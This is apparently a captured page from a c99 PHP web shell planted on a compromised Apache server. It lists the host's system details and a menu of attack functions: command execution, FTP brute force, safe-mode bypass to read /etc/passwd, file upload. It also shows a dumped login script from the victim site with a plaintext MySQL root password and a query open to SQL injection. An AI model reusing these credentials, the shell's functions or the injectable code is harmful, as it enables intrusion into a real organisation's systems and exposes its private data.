110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/bcnu_login/ drwxr-xr-x Free 52.62 GB of 127.8 GB (41.17%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/bcnu_login/ drwxr-xr-x
Free 52.62 GB of 127.8 GB (41.17%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: check_login.php (491 B) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

Information:

Path	/var/www/html/bcnu_login/check_login.php
Size	491 B
MD5	76c86ac5538d4c8ccd3adc0075f0d4f2
Owner/Group	root/root
Perms	-rw-r--r--
Create time	22/09/2013 04:22:38
Access time	11/07/2024 14:55:19
MODIFY time	21/09/2013 21:11:28

FULL HEXDUMP

00000000
00000018
00000030
00000048
00000060
00000078
00000090
000000A8
000000C0
000000D8
000000F0
00000108
00000120
00000138
00000150
00000168
00000180
00000198
000001B0
000001C8
000001E0

3C 3F 0D 0A 09 0D 0A 09 6D 79 73 71 6C 5F 63 6F 6E 6E 65 63 74 28 22 6C
6F 63 61 6C 68 6F 73 74 22 2C 22 72 6F 6F 74 22 2C 22 40 31 34 30 31 32
35 31 38 22 29 3B 0D 0A 09 6D 79 73 71 6C 5F 73 65 6C 65 63 74 5F 64 62
28 22 6D 61 6E 61 67 65 22 29 3B 0D 0A 09 24 73 74 72 53 51 4C 20 3D 20
22 53 45 4C 45 43 54 20 2A 20 46 52 4F 4D 20 75 73 65 72 5F 74 62 20 57
48 45 52 45 20 55 73 65 72 6E 61 6D 65 20 3D 20 27 22 2E 74 72 69 6D 28
24 5F 50 4F 53 54 5B 27 74 78 74 55 73 65 72 6E 61 6D 65 27 5D 29 2E 22
27 20 0D 0A 09 61 6E 64 20 50 61 73 73 77 6F 72 64 52 20 3D 20 27 22 2E
74 72 69 6D 28 24 5F 50 4F 53 54 5B 27 74 78 74 50 61 73 73 77 6F 72 64
27 5D 29 2E 22 27 22 3B 0D 0A 09 24 6F 62 6A 51 75 65 72 79 20 3D 20 6D
79 73 71 6C 5F 71 75 65 72 79 28 24 73 74 72 53 51 4C 29 3B 0D 0A 09 24
6F 62 6A 52 65 73 75 6C 74 20 3D 20 6D 79 73 71 6C 5F 66 65 74 63 68 5F
61 72 72 61 79 28 24 6F 62 6A 51 75 65 72 79 29 3B 0D 0A 09 69 66 28 21
24 6F 62 6A 52 65 73 75 6C 74 29 0D 0A 09 7B 0D 0A 09 09 09 65 63 68 6F
20 22 55 73 65 72 6E 61 6D 65 20 61 6E 64 20 50 61 73 73 77 6F 72 64 20
49 6E 63 6F 72 72 65 63 74 21 22 3B 0D 0A 09 7D 0D 0A 09 65 6C 73 65 0D
0A 09 7B 09 09 09 0D 0A 09 0D 0A 09 09 09 09 68 65 61 64 65 72 28 22 6C
6F 63 61 74 69 6F 6E 3A 68 74 74 70 3A 2F 2F 77 77 77 2E 62 63 6E 75 2E
61 63 2E 74 68 2F 74 65 61 63 68 65 72 2F 42 43 4E 55 49 6E 74 72 61 6E
65 74 2F 22 29 3B 0D 0A 09 09 09 7D 0D 0A 0D 0A 09 6D 79 73 71 6C 5F 63
6C 6F 73 65 28 29 3B 0D 0A 3F 3E

<?      mysql_connect("l
ocalhost","root","@14012
518");   mysql_select_db
("manage");   $strSQL =
"SELECT * FROM user_tb W
HERE Username = '".trim(
$_POST['txtUsername'])."
'    and PasswordR = '".
trim($_POST['txtPassword
'])."'";   $objQuery = m
ysql_query($strSQL);   $
objResult = mysql_fetch_
array($objQuery);   if(!
$objResult)   {   echo
"Username and Password
Incorrect!";   }   else
{       header("l
ocation:http://www.bcnu.
ac.th/teacher/BCNUIntran
et/");   }     mysql_c
lose();  ?>

HEXDUMP: [Full] [Preview]
Base64: [Encode] [+chunk] [+chunk+quotes] [Decode]

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0085 ]--